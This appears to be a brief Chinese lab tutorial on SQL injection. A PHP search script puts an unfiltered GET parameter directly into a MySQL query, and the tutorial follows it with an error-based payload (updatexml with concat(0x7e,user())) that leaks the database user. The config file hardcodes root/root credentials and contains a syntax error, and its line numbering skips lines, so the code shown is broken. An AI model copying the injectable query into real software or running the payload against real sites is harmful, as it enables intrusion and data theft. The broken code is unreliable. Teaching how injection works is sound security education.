PHP代码:config.php 数据库配置文件

    1. <?php
    2. $address='localhost';
    3. $user='root';
    4. $pass='root';
    5. $dbname='test';
    6. $con = mysqli_connect($address,$user,$pass,$dbname);
    7. if(!$con){
    8.     echo mysqli_connect_error();
    10. }
    11. echo '数据库连接成功'!;
    14. ?>

    search.php 漏洞文件

    1. <?php
    2. include_once 'config.php';
    3. $username=$_GET['username'];
    4. if (empty($username)) {
    5.     exit();
    6. }
    7. $sql="SELECT say from admin where name='$username'";
    8. $query=mysqli_query($con,$sql);
    9. $result=mysqli_fetch_array($query);
    10. echo '他说他的年龄是:'.$result[0];
    11. echo '<br>';
    12. echo $sql;
    13. echo mysqli_error($con);
    15. ?>

    username 没有经过过滤 直接代入数据库 所以存在SQL注入
    username=1’ and updatexml(1,concat(0x7e,user()),1) — -a
    image.png